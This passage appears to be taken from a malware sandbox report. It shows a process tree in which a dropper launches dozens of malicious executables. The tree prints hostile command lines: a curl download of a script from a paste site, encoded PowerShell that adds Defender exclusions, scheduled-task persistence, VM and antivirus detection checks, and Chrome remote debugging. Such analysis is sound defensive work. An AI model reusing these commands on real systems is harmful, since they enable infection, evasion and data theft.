        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1944 /prefetch:2
        8⤵
        
        PID:6316
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2228 /prefetch:3
        8⤵
        
        PID:9472
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:8
        8⤵
        
        PID:8632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3416,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3472 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3440,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3532 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:7604
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4724,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:7328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4436 /prefetch:8
        8⤵
        
        PID:5244
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3272,i,16678731883669073355,3013252579616608570,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4428 /prefetch:8
        8⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 1508
        7⤵
        Program crash
        
        PID:11180
    - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4T745x.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4T745x.exe
        5⤵
        
        PID:2028
  - - C:\Users\Admin\Desktop\Files\ewm.exe
      "C:\Users\Admin\Desktop\Files\ewm.exe"
      4⤵
      PID:8196
  - - C:\Users\Admin\Desktop\Files\Taskmgr.exe
      "C:\Users\Admin\Desktop\Files\Taskmgr.exe"
      4⤵
      PID:6408
  - - C:\Users\Admin\Desktop\Files\aaa.exe
      "C:\Users\Admin\Desktop\Files\aaa.exe"
      4⤵
      PID:8328
  - - C:\Users\Admin\Desktop\Files\NVIDIA.exe
      "C:\Users\Admin\Desktop\Files\NVIDIA.exe"
      4⤵
      PID:3712
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zACE83E80\start.bat" "
        5⤵
        
        PID:6332
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\7zACE83E80\start.bat"
        6⤵
        
        PID:6780
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "$d = wmic diskdrive get model;if ($d -like '*DADY HARDDISK*' -or $d -like '*QEMU HARDDISK*') { taskkill /f /im cmd.exe }"
        6⤵
        
        PID:8844
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
        7⤵
        
        PID:7388
  - - C:\Users\Admin\Desktop\Files\pei.exe
      "C:\Users\Admin\Desktop\Files\pei.exe"
      4⤵
      PID:8876
    - - C:\Users\Admin\AppData\Local\Temp\799231197.exe
        
        C:\Users\Admin\AppData\Local\Temp\799231197.exe
        5⤵
        
        PID:8348
  - - C:\Users\Admin\Desktop\Files\out.exe
      "C:\Users\Admin\Desktop\Files\out.exe"
      4⤵
      PID:6708
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic nic where NetEnabled='true' get MACAddress,Name
        5⤵
        
        PID:1572
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:8332
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:2188
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:9412
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:10328
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:8212
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:6768
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:2912
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:456
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:10100
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:11232
  - - C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
      4⤵
      PID:7348
  - - C:\Users\Admin\Desktop\Files\PaoNan.exe
      "C:\Users\Admin\Desktop\Files\PaoNan.exe"
      4⤵
      PID:8784
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\npp.exe"
      4⤵
      PID:9388
    - - C:\Users\Admin\Desktop\Files\npp.exe
        
        C:\Users\Admin\Desktop\Files\npp.exe
        5⤵
        
        PID:9816
      - C:\Users\Admin\AppData\Local\Temp\3079318584.exe
        
        C:\Users\Admin\AppData\Local\Temp\3079318584.exe
        6⤵
        
        PID:9356
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\t1.exe"
      4⤵
      PID:9280
    - - C:\Users\Admin\Desktop\Files\t1.exe
        
        C:\Users\Admin\Desktop\Files\t1.exe
        5⤵
        
        PID:9404
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\Client.exe"
      4⤵
      PID:10836
    - - C:\Users\Admin\Desktop\Files\Client.exe
        
        C:\Users\Admin\Desktop\Files\Client.exe
        5⤵
        
        PID:9012
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\WINDOW~1.EXE"
        6⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\WINDOW~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\WINDOW~1.EXE
        7⤵
        
        PID:4300
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\t.exe"
      4⤵
      PID:10892
    - - C:\Users\Admin\Desktop\Files\t.exe
        
        C:\Users\Admin\Desktop\Files\t.exe
        5⤵
        
        PID:4696
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\AUTOUP~1.EXE"
      4⤵
      PID:7568
    - - C:\Users\Admin\Desktop\Files\AUTOUP~1.EXE
        
        C:\Users\Admin\Desktop\Files\AUTOUP~1.EXE
        5⤵
        
        PID:8744
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\020820~1.EXE"
      4⤵
      PID:2672
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\VIDSUS~1.EXE"
      4⤵
      PID:8996
    - - C:\Users\Admin\Desktop\Files\VIDSUS~1.EXE
        
        C:\Users\Admin\Desktop\Files\VIDSUS~1.EXE
        5⤵
        
        PID:10412
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c move Recreation Recreation.bat & Recreation.bat
        6⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c move Recreation Recreation.bat & Recreation.bat
        7⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:10088
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        8⤵
        
        PID:7628
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\5_6253~1.EXE"
      4⤵
      PID:824
    - - C:\Users\Admin\Desktop\Files\5_6253~1.EXE
        
        C:\Users\Admin\Desktop\Files\5_6253~1.EXE
        5⤵
        
        PID:10804
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3500
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\tt.exe"
      4⤵
      PID:7352
    - - C:\Users\Admin\Desktop\Files\tt.exe
        
        C:\Users\Admin\Desktop\Files\tt.exe
        5⤵
        
        PID:10080
      - C:\Windows\sysmablsvr.exe
        
        C:\Windows\sysmablsvr.exe
        6⤵
        
        PID:8220
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\anne.exe"
      4⤵
      PID:8360
    - - C:\Users\Admin\Desktop\Files\anne.exe
        
        C:\Users\Admin\Desktop\Files\anne.exe
        5⤵
        
        PID:8796
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\NORTHS~1.EXE"
      4⤵
      PID:6864
    - - C:\Users\Admin\Desktop\Files\NORTHS~1.EXE
        
        C:\Users\Admin\Desktop\Files\NORTHS~1.EXE
        5⤵
        
        PID:9588
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k move Surrey Surrey.cmd && Surrey.cmd && exit
        6⤵
        
        PID:8164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /k move Surrey Surrey.cmd && Surrey.cmd && exit
        7⤵
        
        PID:5460
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\Survox.exe"
      4⤵
      PID:10080
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\SRBIJA~1.EXE"
      4⤵
      PID:7428
    - - C:\Users\Admin\Desktop\Files\SRBIJA~1.EXE
        
        C:\Users\Admin\Desktop\Files\SRBIJA~1.EXE
        5⤵
        
        PID:1340
      - C:\Users\Admin\AppData\Local\Temp\is-72NTC.tmp\SRBIJA~1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-72NTC.tmp\SRBIJA~1.tmp" /SL5="$204EE,3939740,937984,C:\Users\Admin\Desktop\Files\SRBIJA~1.EXE"
        6⤵
        
        PID:2488
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\88aext0k.exe"
      4⤵
      PID:8788
    - - C:\Users\Admin\Desktop\Files\88aext0k.exe
        
        C:\Users\Admin\Desktop\Files\88aext0k.exe
        5⤵
        
        PID:440
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:6440
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:2240
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:6260
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:9412
      - C:\Windows\explorer.exe
        
        explorer.exe
        6⤵
        
        PID:6268
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\svhoste.exe"
      4⤵
      PID:9696
    - - C:\Users\Admin\Desktop\Files\svhoste.exe
        
        C:\Users\Admin\Desktop\Files\svhoste.exe
        5⤵
        
        PID:10548
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\STEALC~2.EXE"
      4⤵
      PID:7648
    - - C:\Users\Admin\Desktop\Files\STEALC~2.EXE
        
        C:\Users\Admin\Desktop\Files\STEALC~2.EXE
        5⤵
        
        PID:1892
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\KHTOAW~1.EXE"
      4⤵
      PID:4940
    - - C:\Users\Admin\Desktop\Files\KHTOAW~1.EXE
        
        C:\Users\Admin\Desktop\Files\KHTOAW~1.EXE
        5⤵
        
        PID:9872
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5496
  - - C:\Users\Admin\Desktop\Files\Server.exe
      "C:\Users\Admin\Desktop\Files\Server.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:6116
  - - C:\Users\Admin\Desktop\Files\RambledMime.exe
      "C:\Users\Admin\Desktop\Files\RambledMime.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:5752
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4424
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:5876
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        6⤵
        
        PID:1408
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        6⤵
        
        PID:1348
  - - C:\Users\Admin\Desktop\Files\GoogleUpdate.exe
      "C:\Users\Admin\Desktop\Files\GoogleUpdate.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2300
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5236
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1620
      - C:\Program Files\Google\Chrome\Application\AZBUHHS4ZXAOVL7SV2TK8.exe
        
        "C:\Program Files\Google\Chrome\Application\AZBUHHS4ZXAOVL7SV2TK8.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5532
  - - C:\Users\Admin\Desktop\Files\loader.exe
      "C:\Users\Admin\Desktop\Files\loader.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetWindowsHookEx
      PID:5788
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "payload.bat"
        5⤵
        
        PID:3128
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
        6⤵
        
        PID:5052
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_PointingDevice get PNPDeviceID /value
        7⤵
        
        PID:824
        
        C:\Windows\system32\find.exe
        
        find "PNPDeviceID"
        7⤵
        
        PID:3336
      - C:\Windows\system32\curl.exe
        
        curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent
        6⤵
        Blocklisted process makes network request
        
        PID:5156
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe
        
        python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        6⤵
        
        PID:2864
        
        C:\Windows\Temp\{F50D9C67-5262-4496-A09B-37F61C38E066}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{F50D9C67-5262-4496-A09B-37F61C38E066}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=588 -burn.filehandle.self=596 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        7⤵
        
        PID:1532
        
        C:\Windows\Temp\{8B3CAF93-AB50-4004-872F-B4206B0E8688}\.be\python-3.10.0rc2-amd64.exe
        
        "C:\Windows\Temp\{8B3CAF93-AB50-4004-872F-B4206B0E8688}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{AF6DF112-A471-4733-B752-D4D7777AE457} {B77A4446-D00B-4D00-86F8-5BC5897CF905} 1532
        8⤵
        
        PID:7384
      - C:\Windows\system32\curl.exe
        
        curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure
        6⤵
        
        PID:6928
  - - C:\Users\Admin\Desktop\Files\Security.exe
      "C:\Users\Admin\Desktop\Files\Security.exe"
      4⤵
      Executes dropped EXE
      PID:3944
    - - C:\Users\Admin\AppData\Local\Temp\$77Security.exe
        
        "C:\Users\Admin\AppData\Local\Temp\$77Security.exe"
        5⤵
        
        PID:1384
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6672
    - - C:\Users\Admin\AppData\Local\Temp\Install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        5⤵
        
        PID:636
  - - C:\Users\Admin\Desktop\Files\Pichon.exe
      "C:\Users\Admin\Desktop\Files\Pichon.exe"
      4⤵
      PID:8084
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
        5⤵
        
        PID:7084
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get Model
        6⤵
        
        PID:4016
      - C:\Windows\system32\findstr.exe
        
        findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
        6⤵
        
        PID:1520
  - - C:\Users\Admin\Desktop\Files\OneDrive.exe
      "C:\Users\Admin\Desktop\Files\OneDrive.exe"
      4⤵
      PID:7192
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAZABvAGMAdQBtAGUAbgB0AHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA=
        5⤵
        
        PID:7068
    - - C:\Users\Admin\AppData\Local\Temp\ozwrrl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ozwrrl.exe"
        5⤵
        
        PID:3664
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6464
    - - C:\Users\Admin\AppData\Local\Temp\upcgct.exe
        
        "C:\Users\Admin\AppData\Local\Temp\upcgct.exe"
        5⤵
        
        PID:2296
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs"
        6⤵
        
        PID:7356
      - C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
        6⤵
        
        PID:8752
  - - C:\Users\Admin\Desktop\Files\svchost.exe
      "C:\Users\Admin\Desktop\Files\svchost.exe"
      4⤵
      PID:6964
    - - C:\Users\Admin\Desktop\Files\svchost.exe
        
        "C:\Users\Admin\Desktop\Files\svchost.exe"
        5⤵
        
        PID:6324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:8436
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:7792
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:6920
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:7288
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5828
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:8892
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:9112
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:9284
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:10516
  - - C:\Users\Admin\Desktop\Files\Meeting.exe
      "C:\Users\Admin\Desktop\Files\Meeting.exe"
      4⤵
      PID:5244
  - - C:\Users\Admin\Desktop\Files\pothjadwtrgh.exe
      "C:\Users\Admin\Desktop\Files\pothjadwtrgh.exe"
      4⤵
      PID:7480
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 1272
        5⤵
        Program crash
        
        PID:6284
  - - C:\Users\Admin\Desktop\Files\RDX123456.exe
      "C:\Users\Admin\Desktop\Files\RDX123456.exe"
      4⤵
      PID:1396
  - - C:\Users\Admin\Desktop\Files\m.exe
      "C:\Users\Admin\Desktop\Files\m.exe"
      4⤵
      PID:3220
    - - C:\Windows\sysvplervcs.exe
        
        C:\Windows\sysvplervcs.exe
        5⤵
        
        PID:8636
  - - C:\Users\Admin\Desktop\Files\windowsexecutable.exe
      "C:\Users\Admin\Desktop\Files\windowsexecutable.exe"
      4⤵
      PID:8124
  - - C:\Users\Admin\Desktop\Files\PctOccurred.exe
      "C:\Users\Admin\Desktop\Files\PctOccurred.exe"
      4⤵
      PID:6424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
        5⤵
        
        PID:8540
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:9184
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        6⤵
        
        PID:11172
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:9552
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
        6⤵
        
        PID:7076
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 193997
        6⤵
        
        PID:10636
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
        6⤵
        
        PID:4556
      - C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
        
        Restructuring.pif y
        6⤵
        
        PID:9248
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:5932
  - - C:\Users\Admin\Desktop\Files\DeliciousPart.exe
      "C:\Users\Admin\Desktop\Files\DeliciousPart.exe"
      4⤵
      PID:8372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Tall Tall.bat & Tall.bat
        5⤵
        
        PID:6932
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:7812
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        6⤵
        
        PID:6220
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5324
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        6⤵
        
        PID:7324
  - - C:\Users\Admin\Desktop\Files\channel.exe
      "C:\Users\Admin\Desktop\Files\channel.exe"
      4⤵
      PID:7948
  - - C:\Users\Admin\Desktop\Files\dxwebsetup.exe
      "C:\Users\Admin\Desktop\Files\dxwebsetup.exe"
      4⤵
      PID:5540
    - - C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"
        5⤵
        
        PID:8752
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
        6⤵
        
        PID:2212
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\a.exe"
      4⤵
      PID:7240
    - - C:\Users\Admin\Desktop\Files\a.exe
        
        C:\Users\Admin\Desktop\Files\a.exe
        5⤵
        
        PID:10480
      - C:\Users\Admin\sysvplervcs.exe
        
        C:\Users\Admin\sysvplervcs.exe
        6⤵
        
        PID:5544
        
        C:\Windows\svchost.com
        
